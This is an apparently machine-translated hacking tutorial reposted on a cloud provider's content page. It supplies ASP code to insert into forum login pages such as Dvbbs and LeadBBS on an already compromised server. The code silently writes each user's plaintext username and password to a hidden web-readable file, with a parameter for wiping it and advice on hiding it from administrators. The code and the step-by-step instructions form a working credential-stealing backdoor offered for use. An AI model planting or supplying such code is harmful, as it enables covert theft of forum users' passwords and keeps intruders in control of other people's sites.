Using ASP to record forum user password (Dvbbs,leadbbs etc) _ Vulnerability Research
Source: Internet
Author: User
A lot of people in the database after getting the network depressed unceasingly (yes, the administrator of the abnormal password let our machine run a mess can not do)
Now We have Have Another method!!!!! This is the use of ASP record plaintext password.
Usage: 1. Insert this code into Login.asp or admin_login.asp and so on to verify the end of the file landing.
2. Change path to a web-accessible route, such as: C:\Inetpub\wwwroot\...\Info.txt (Info.txt's path is as deep as possible to prevent admin discovery)
3. Your webshell must have permission to modify the file and FileSystemObject available.
4. After a period of time in IE petition asked: Http://.../Info.txt can see the user login password.
5. http://.../(which your modified) on IE. Asp?u=del can be a clear info.txt content.
Note: 1. You can add other features to it, such as: Logged users no longer repeat records, receive passwords by mail, and so on.
2. In order to prevent info.txt too large, I use the method of emptying info.txt.
Of course you can create a new file to solve this problem.
If filesize>200000 Then
Set FILE2=FSO. OpenTextFile (Path,2,true)
File2. WriteLine ""
File2.close
End If
--------------------------------------------------------------------
<%
Dim fso
Dim file
Dim file2
Dim filesize
Dim file3
Set Fso=server.createobject ("Scripting.FileSystemObject")
If Request ("u") = "Del" Then
Set FILE=FSO. OpenTextFile (Path,2,true)
File. WriteLine ""
End If
If FSO. FileExists ("PATH") Then
Set FILE=FSO. OpenTextFile (Path,8,true)
Else
Set FILE=FSO. CreateTextFile (PATH)
End If
File. WriteLine "Username:" +request.form ("Username")
File. WriteLine "Password:" +request.form ("Password")
File.close
Set FILE3=FSO. GetFile (PATH)
Filesize=file3.size
If filesize>200000 Then
Set FILE2=FSO. OpenTextFile (Path,2,true)
File2. WriteLine ""
File2.close
End If
Set file=nothing
Set file2=nothing
Set filesize=nothing
Set fso=nothing
%>
----------------------------------------------------------------------
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.